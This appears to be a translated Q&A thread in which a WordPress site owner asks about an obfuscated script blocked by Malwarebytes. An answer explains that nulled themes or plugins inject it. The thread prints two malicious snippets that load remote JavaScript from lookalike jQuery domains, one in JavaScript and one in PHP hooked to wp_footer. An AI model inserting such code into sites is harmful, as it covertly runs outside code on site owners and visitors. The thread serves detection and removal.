我正在使用恶意软件字节,每次访问我的wordpress网站时,它都会阻止尝试在页面上运行的脚本,脚本为:
<script type="text/javascript">
if (!document.referrer || document.referrer == '') {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
} else {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
}
</script>
我不确定它是否是恶意的但是我想删除它,但我不知道哪个插件或文件导致它,我已经尝试查看页面源等。
脚本意味着什么,有没有办法找出导致它的原因?
非常感谢任何帮助。
答案 0 :(得分:3)
你正在使用一个wordpress插件或主题,你可能从一个“nulled&#39;主题和插件。
几乎所有此类网站都使用商业模式,他们提供高级主题和插件,通常免费花费5美元-75美元。
但俗话说,没有免费的午餐。作为免费插件/主题的交换,网站所有者添加了包含来自外部域的js文件的代码,该文件为您的网站添加了横幅。
为防止网站管理员或开发者立即注意到横幅(或只是反向链接或三个),以管理员身份登录的任何人或/和没有推荐人网址的任何人都不会显示广告。
在你的情况下,有效载荷是从一个类似于真实的域中包含的,因此欺骗了足够的没有经验的Wordpress网站管理员作为属于jQuery的东西。官方jQuery CDN位于此处//code.jquery.com/
确保从阴暗的地方检查所有主题或插件的类似代码,这些代码也可能在图像文件内,尽管通常在init.php或functions.php中。以下是使用jquery域的不同变体的类似代码的另一个示例。
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
if (@fopen($jquery,'r')){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
答案 1 :(得分:0)
您可以使用此问题中建议的其中一个应用程序在您的wordpress目录中搜索此脚本:Tools to search for strings inside files without indexing。